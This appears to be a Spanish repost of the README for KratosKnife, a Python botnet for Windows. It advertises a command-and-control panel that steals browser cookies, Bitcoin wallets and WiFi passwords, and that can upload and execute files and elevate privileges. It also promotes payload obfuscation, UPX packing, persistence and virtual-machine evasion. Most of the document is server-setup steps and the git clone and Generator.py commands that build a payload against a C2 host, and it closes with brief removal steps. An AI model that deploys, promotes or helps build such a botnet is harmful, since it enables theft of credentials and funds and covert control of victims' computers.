KratosKnife es un BOTNET avanzado escrito en Python 3 para el sistema operativo Windows. Viene con un montón de características avanzadas como la persistencia y métodos de detección de VM, Built-in Binder, etc.
ESTE SOFTWARE SE PROPORCIONA “TAL CUAL” SIN GARANTÍA DE NINGÚN TIPO. USTED PUEDE USAR ESTE SOFTWARE BAJO SU PROPIO RIESGO. EL USO ES RESPONSABILIDAD COMPLETA DEL USUARIO FINAL. LOS DESARROLLADORES NO ASUMEN NINGUNA RESPONSABILIDAD Y NO SON RESPONSABLES DE NINGÚN MAL USO O DAÑO CAUSADO POR ESTE PROGRAMA.
Comandos Disponibles en Panel Attacker/Admin
Clients Command | Location | Stealer |
---|---|---|
1. Ping | 1. Get Location Information | 1. Steal Firefox Cookie |
2. Upload & Execute File | 2. Show Location On Map | 2. Steal Chrome Cookie |
3. Show MessageBox | Computer Commands | 3. Steal Bitcoin Wallet |
4. Take Screenshot | 1. Shutdown | 4. Steal WiFI Saved Password |
5. Installed Software | 2. Restart | Keylogger |
6. Execute Scripts | 3. Logoff | 1. Start Keylogger [Under Development] |
7. Elevate User Status | Open Webpage | 2. Stop Keylogger [Under Development] |
8. Clear TEMP Folder | 1. Open Webpage (Visible) | 3. Retrive Logs [Under Development] |
Clients Commands | DDOS Attack |
---|---|
1. Close Connection | Start DDOS [Under Development] |
2. Move Client [Under Development] | Stop DDOS [Under Development] |
3. Blacklist IP [Under Development] | |
4. Update Client [Under Development] | |
5. Restart Client [Under Development] | |
6. Uninstall [Under Development] |
Características del Generador
- Cifrar el código fuente utilizando la codificación AES de 256 bits
- Cifrar el código fuente utilizando la codificación Base64
- Packing Evil Exe usando UPX Packer
- Modo interactivo [Parámetro requerido del generador de preguntas]
- Modo de depuración [Puede ser usado en la depuración de la carga útil]
- Persistencia Payload
- 3 poderosos métodos para detectar/Bypass VM (como VirtualBox, VMware, Sandboxie)
- Binder de Archivo incoporado
- Iconos útiles dentro de la carpeta de icon
Métodos Bypass Máquina Virtual Incluyen |
---|
Registry Check |
Processes and Files Check |
MAC Adderess Check |
Capturas Pantalla

Tablero de control (Attacker Control Panel)

Mostrar la ubicación de la víctima en el mapa

Prerrequisito
- Python 3.X
- Pocos módulos externos
Configuración del Servidor
- Sube y descomprime el panel.zip (disponible en este repositorio) en tu hosting
- Crear una base de datos con cualquier nombre que quieras
- Cambiar los datos en classes/Database.php
- Cambiar el permiso de archivos y carpetas a 777
- Dirígete a
install.php
para crear las tablas del botnet automáticamente
- Instalar XAMPP, y poner los archivos del panel dentro de la carpeta htdocs y ejecutar el servicio de Apache y MySQL en el controlador XAMPP
- Crear una base de datos con cualquier nombre que quieras
- Cambiar los datos en classes/Database.php
- Dirígete a
install.php
para crear las tablas del botnet automáticamente
Uso
#Instalar dependencias
$ Install latest python 3.x
#Clonar este repositorio
$ git clone https://github.com/PushpenderIndia/KratosKnife.git
#Ingresar en el repositorio
$ cd KratosKnife/Botnet-Generator
#Instalar dependencias
$ python -m pip install -r requirements.txt
#Obtener el menú de ayuda
$ python Generator.py --help
#Creando Payload/BOTNET
$ python Generator.py -s localhost/panel -o output_file_name --icon icon/exe.ico
Argumentos Disponibles
- Argumentos opcionales
Short Hand | Full Hand | Description |
---|---|---|
-h | –help | show this help message and exit |
–interactive | Takes Input by asking Questions | |
–icon ICON | Specify Icon Path, Icon of Evil File [Note : Must Be .ico] | |
-i INTERVAL | –interval INTERVAL | Time between reports in seconds. default=12. [Under Development] |
-t TIME_PERSISTENT | –persistence TIME_PERSISTENT | Becoming Persistence After __ seconds. default=10 |
-b file.txt | –bind LEGITIMATE_FILE_PATH.pdf | Built-In Binder : Specify Path of Legitimate file. [Under Development] |
- Argumentos obligatorios
Short Hand | Full Hand | Description |
---|---|---|
-s SERVER | –server SERVER | Command & Control Server for Botnet. |
-o OUT | –output OUTPUT | Output file name. |
Eliminar BOTNET
Método 1:
- Ir al inicio, escribir regedit y ejecutar el primer programa, esto abrirá el editor del registro.
- Navegar a la siguiente ruta Computer\HKEY_CURRENT_USER\NSoftware\Microsoft\Windows\CurrentVersion\Run Debería haber una entrada llamada “WindowsUpdate“, haz clic con el botón derecho del ratón en esta entrada y selecciona Eliminar.
- Ve a tu ruta de usuario > AppData > Roaming, verás un archivo llamado “svchost.exe“, esta es el RAT, haz clic con el botón derecho del ratón > Eliminar.
- Reiniciar el sistema.
Método 2:
- Ejecutar “RemoveBOTNET.bat” en el sistema infectado.
- Reiniciar el PC infectado para detener el actual Running Evil File.
- Ejecutar “RemoveBOTNET.bat” de nuevo.
TODO
- Agregar nuevas características
- Añadir GUI al generador de BOTNET
Contacto
KratosKnife (este enlace se abre en una nueva ventana) por PushpenderIndia (este enlace se abre en una nueva ventana)
KratosKnife is a Advanced BOTNET Written in python 3 for Windows OS. Comes With Lot of Advanced Features such as Persistence & VM Detection Methods, Built-in Binder, etc